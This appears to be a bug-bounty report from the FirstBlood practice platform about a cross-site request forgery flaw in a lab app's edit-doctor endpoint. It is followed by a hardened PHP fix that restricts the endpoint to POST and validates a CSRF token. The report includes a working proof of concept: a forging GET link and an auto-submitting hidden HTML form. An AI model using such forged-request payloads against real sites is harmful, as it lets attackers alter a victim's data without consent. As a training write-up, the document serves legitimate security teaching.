FirstBlood-#1383: Edit doctor details with CSRF
This issue was discovered on FirstBlood v3

On 2022-12-09, pichik Level 4 reported:

Hi,
I found that the request which edits doctor details is vulnerable to CSRF.

DESCRIPTION

I am not sure if these are two separate bugs or just one, as you can do this with both a POST and a GET request.

Here are the edit-doctor requests without a CSRF token:
POST:

GET:

POC:

Link for GET request: https://019046743f9e-pichik.a.firstbloodhackers.com/drpanel/drapi/edit-dr.php?drid=1&name=PWND&bio=PWND&bookable=1

CSRF Payload:

<html>
<form id="1" action="https://019046743f9e-pichik.a.firstbloodhackers.com/drpanel/drapi/edit-dr.php" method="post" enctype="application/x-www-form-urlencoded">
<input name='name' value='PWND' type='hidden'>
<input name='drid' value='1' type='hidden'>
<input name='bio' value='PWND' type='hidden'>
<input name='bookable' value='1' type='hidden'>
</form> 
<script>
document.getElementById("1").submit()
</script>
</html>

This is working only in Firefox, as Chrome is not sending cookies.
(I guess it's because the SameSite flag in the cookie is blank, but I'm not sure.)

Impact

An attacker can edit doctor details or insert the XSS payload which I reported before.

REMEDIATION

The request contains a csrf token, but this token does nothing.
Forbidding changes via GET requests and implementing server-side CSRF token validation should fix this issue.

P4 Low

Endpoint: /drpanel/drapi/edit-dr.php

Parameter: csrf

Payload: -


FirstBlood ID: 58
Vulnerability Type: Cross Site Request Forgery

There is a CSRF vulnerability on /drpanel/edit-dr.php via a GET request and a lack of token validation. It was intended that a POST request would not work because no cookies are sent on the request (due to SameSite), but through an oversight this cookie was overwritten, rendering the flag useless.
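The remediation the reporter suggests, together with the platform's note that the SameSite cookie was overwritten, maps onto three concrete server-side controls. The following is an added example of a hardened edit-doctor handler; it is not FirstBlood's own code. The session-based login, the `$pdo` connection and the `doctors` table are assumptions for illustration; the `csrf`, `drid`, `name`, `bio` and `bookable` parameter names come from the report.

```php
<?php
// Added example (not FirstBlood's code): hardened handler for editing doctor details.
// Assumptions: the user is logged in via a PHP session, $pdo is a PDO connection,
// and doctor records live in a table named "doctors".
declare(strict_types=1);

// 1. Issue the session cookie with SameSite so a cross-site POST does not carry it.
//    Set this once, before session_start(), and never re-issue the cookie later
//    without the flag (the overwrite described above is what made it useless).
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Lax',
]);
session_start();

// One random token per session; the legitimate edit form embeds it as
// <input type="hidden" name="csrf" value="<?= htmlspecialchars($_SESSION['csrf_token'], ENT_QUOTES) ?>">
if (empty($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}

// Constant-time comparison; a missing, empty or mismatched token is rejected.
function csrf_token_is_valid(?string $submitted, ?string $expected): bool
{
    return is_string($submitted) && is_string($expected)
        && $expected !== '' && hash_equals($expected, $submitted);
}

// 2. State changes are POST-only, so the GET link from the report no longer edits anything.
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    header('Allow: POST');
    http_response_code(405);
    exit('Method Not Allowed');
}

// 3. The token is actually checked on the server instead of being carried along unused.
if (!csrf_token_is_valid($_POST['csrf'] ?? null, $_SESSION['csrf_token'] ?? null)) {
    http_response_code(403);
    exit('Invalid CSRF token');
}

// Only now read and apply the change (authorization that this user may edit this
// doctor is assumed to happen here as well).
$drid     = filter_input(INPUT_POST, 'drid', FILTER_VALIDATE_INT);
$name     = trim((string)($_POST['name'] ?? ''));
$bio      = trim((string)($_POST['bio'] ?? ''));
$bookable = isset($_POST['bookable']) ? 1 : 0;

if ($drid === false || $drid === null || $name === '') {
    http_response_code(400);
    exit('Bad Request');
}

$stmt = $pdo->prepare('UPDATE doctors SET name = ?, bio = ?, bookable = ? WHERE id = ?');
$stmt->execute([$name, $bio, $bookable, $drid]);
echo 'Doctor updated';
```

The browser-side SameSite flag is defence in depth only: Firefox sent the cookie in the reporter's test and the flag was lost on overwrite anyway, so the method restriction and the server-side token check are the controls that actually close the bug.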